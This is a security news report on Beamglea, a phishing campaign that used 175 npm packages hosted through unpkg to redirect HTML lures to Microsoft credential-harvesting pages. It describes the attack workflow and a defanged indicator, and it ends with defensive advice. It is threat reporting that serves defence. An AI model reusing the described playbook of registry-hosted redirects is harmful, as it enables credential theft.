Security researchers have discovered 175 malicious packages on the npm registry, collectively downloaded about 26,000 times, that were used as part of a credential phishing campaign named Beamglea. The campaign used npm and unpkg.com as free hosting to serve redirect scripts, which in turn sent victims to Microsoft credential harvesting pages, increasing the realism and success rate of the attacks.
Campaign details
Researchers, including Kush Pandya and investigators at Socket, found that the operation published 175 packages across nine npm accounts. The packages have randomized names, for example packages named like redirect-xxxxxx, which makes accidental installation by developers unlikely. Still, download counts include activity from security teams, automated scanners, and CDN fetches after disclosure.
A Python helper, redirect_generator.py, was used to automatically create and publish npm packages with names such as redirect-xxxxxx. The script injects a victim email address and a phishing URL into each package before publishing. Once live, the packages were referenced via the UNPKG CDN, for example unpkg[.]com/redirect-xs13nr@1.0.0/beamglea.js, to deliver a JavaScript file named beamglea.js that contained victim-specific redirect instructions.
The attackers also produced more than 630 HTML files that masquerade as purchase orders, technical specifications, or project documents. These specially crafted HTML files, when opened in a browser, load the JavaScript from the UNPKG CDN and immediately redirect the user to the phishing domain, passing the victim’s email in the URL fragment. The phishing page then pre-fills the email field, creating the impression of a legitimate login portal and lowering the victim’s suspicion, which raises the chance of credential submission.
Why this is notable, and how it worked
Unlike traditional malware that executes on installation, these npm packages did not run malicious code on developers’ systems. Instead the attackers abused trusted infrastructure, using the open npm registry and unpkg.com to host static assets that function as resilient, low-cost phishing infrastructure. By automating package creation and publishing, and by embedding victim-specific data into hosted JavaScript, the threat actors created a scalable and reusable playbook that could be adopted by other groups.
Socket reported that Beamglea targeted more than 135 organizations in industrial, technology, and energy sectors worldwide. The campaign’s reliance on reputable hosting and minimal code highlights how legitimate developer ecosystems can be co-opted into attack infrastructure, while remaining difficult to detect through standard package-audit techniques.
Impact and recommendations
The campaign underlines the need for layered defenses, including user awareness of suspicious document attachments, strict email filtering, and monitoring of inbound traffic to corporate authentication portals. For developers and package registry maintainers, additional controls such as monitoring for automated publishing patterns, stricter account verification, and rapid takedown coordination with CDN providers can reduce abuse of open registries.
Security teams should hunt for signs of HTML attachments that contain remote script references to unpkg[.]com, and consider blocking or inspecting such files. Organizations that rely on cloud-based identity providers should enable multi factor authentication, conditional access policies, and alerting for unusual login flows where an email field is pre populated from a URL.
